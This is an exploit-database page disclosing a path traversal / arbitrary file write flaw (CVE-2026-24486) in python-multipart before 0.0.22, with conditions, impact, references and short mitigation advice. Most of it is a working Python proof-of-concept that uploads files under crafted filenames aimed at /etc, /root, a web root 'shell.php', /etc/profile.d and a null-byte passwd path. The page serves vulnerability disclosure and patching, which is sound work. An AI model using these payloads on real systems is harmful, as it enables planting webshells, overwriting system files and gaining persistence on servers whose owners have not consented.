Python-Multipart <0.0.22 - Path Traversal / Arbitrary File Write (CVE-2026-24486)

2026.03.08

Credit: cardosource

Risk: High

Local: No

Remote: Yes

CVE: CVE-2026-24486

CWE: N/A

Exploit Title: Python-Multipart <0.0.22 - Path Traversal / Arbitrary File Write
Date: 2026-02-23
Exploit Author: cardosource
Vendor Homepage: https://github.com/Kludex/python-multipart
Software Link: https://pypi.org/project/python-multipart/
Version: < 0.0.22
Tested on: Ubuntu / Python 3.13.5 / Docker (as root for demo)
CVE: CVE-2026-24486

Vulnerability Description:
Path Traversal vulnerability in python-multipart streaming multipart parser when using non-default options UPLOAD_DIR and UPLOAD_KEEP_FILENAME=True.
An attacker can craft a malicious filename to write uploaded files to arbitrary locations on the filesystem.

Exploitation Conditions:
- Application configures UPLOAD_DIR (custom upload directory)
- UPLOAD_KEEP_FILENAME=True (keeps original client filename)
- File size exceeds memory limit (triggers disk flush)

Impact:
Arbitrary file write → potential RCE (e.g., upload webshell to web root), config overwrite, etc.

Proof-of-Concept (Python script using requests):

import requests
import time
import os
import sys


TARGET_URL   = "http://localhost:8000/upload"   
SOURCE_FILE  = "/etc/hosts" # Small file to upload (content written to target)

if not os.path.exists(SOURCE_FILE):
    print(f"[!] Source file not found: {SOURCE_FILE}")
    sys.exit(1)

# Malicious filenames (payloads)
payloads = [
    "/tmp/poc-abs.txt",
    "/etc/poc-etc.txt",
    "/root/poc-root.txt",
    "../../var/www/html/shell.php",
    "../../etc/profile.d/mal.sh",
    "../../../tmp/poc-deep.txt",
    "../../etc/passwd%00.txt",
    "//etc//poc-double-slash.txt",
]

print("[*] CVE-2026-24486 PoC")
print(f"[*] Target: {TARGET_URL}")
print(f"[*] Using source file: {SOURCE_FILE}")
print(f"[*] Testing {len(payloads)} payloads...\n")

for i, filename in enumerate(payloads, 1):
    print(f"[{i}/{len(payloads)}] Testing: {filename}")
    
    try:
        files = {
            'file': (filename, open(SOURCE_FILE, 'rb'), 'text/plain')
        }
        
        r = requests.post(TARGET_URL, files=files, timeout=8)
        
        print(f"    Status: {r.status_code}")
        if r.text.strip():
            print(f"    Response: {r.text.strip()}")
        else:
            print("    Response: (empty)")
    
    except Exception as e:
        print(f"    Error: {e}")
    
    print("-" * 50)
    time.sleep(1.0)

print("\n[*] Done.")
print("Verify files in container:")
print("  docker exec -it vuln-poc find / -name '*poc*' -o -name '*shell*' 2>/dev/null")
print("\nMitigation:")
print("  - Upgrade: pip install python-multipart>=0.0.22")
print("  - Avoid UPLOAD_KEEP_FILENAME=True")
print("  - Sanitize: filename = os.path.basename(file.filename)")

References:

https://nvd.nist.gov/vuln/detail/CVE-2026-24486

https://github.com/Kludex/python-multipart/security/advisories/GHSA-wp53-j4wj-2cfg

https://github.com/Kludex/python-multipart/commit/9433f4bbc9652bdde82bbe380984e32f8cfc89c4

(patch)

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Python-Multipart <0.0.22 - Path Traversal / Arbitrary File Write (CVE-2026-24486)

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.